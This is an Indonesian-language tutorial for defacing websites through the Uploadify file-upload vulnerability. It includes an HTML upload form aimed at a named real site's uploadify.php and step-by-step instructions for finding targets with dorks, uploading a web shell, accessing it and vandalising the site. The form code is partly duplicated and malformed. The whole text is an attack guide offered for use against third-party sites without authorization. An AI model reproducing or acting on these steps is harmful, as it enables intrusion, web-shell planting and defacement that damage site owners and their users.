Hallo guys jumpa lagi dengan saya, Kali ini gua mau share tutorial deface yaitu Metode Deface Uploadify Vulnrability File Uploads. ini POC lama sih sebenernya cuma ya gapapa lah buat di update
Meski cara ini tergolong lawas namun tidak ada salahnya untuk sekedar berbagi,
Bahan-Bahan :
=> smartphone / pc
=> Koneksi Internet
=> CSRF
=> Dork
=> Shell (kalo blm punya cari di google)
CSRF :
<body><form enctype="multipart/form-data" action="http://lab.ics.org.ru/media/filebrowser/uploadify/uploadify.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="10000000" />
<input type="hidden" name="folder" value="uploads" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<input type="hidden" name="folder" value="uploads" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
</body>
</html>
</html>
Tutorial :
1. Copy CSRF di atas lalu save dengan format .html
2. Dorking
3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank)
4. Edit CSRF yg tadi dah di save, masukan url target ke bagian action="urltarget" lalu save lg (format tetap html)
5. Buka file CSRF tadi, pilih file yang mau kalian uoload (terserah mau shell/script)
6. Jika Vuln hasilnya akan ada nama/url file kalian. Contoh /shell.php
7. Nah untuk akses shell nya, silahkan kalian copy nama/url file kalian lalu taruh di belakang alamat web target. Contoh : www.site-target.co.li/shell.php
8. Silahkan kalian acak2 website nya, tapi jika web Indonesia mohon jangan di rusak, jika ingin tebas index, backup dlu index nya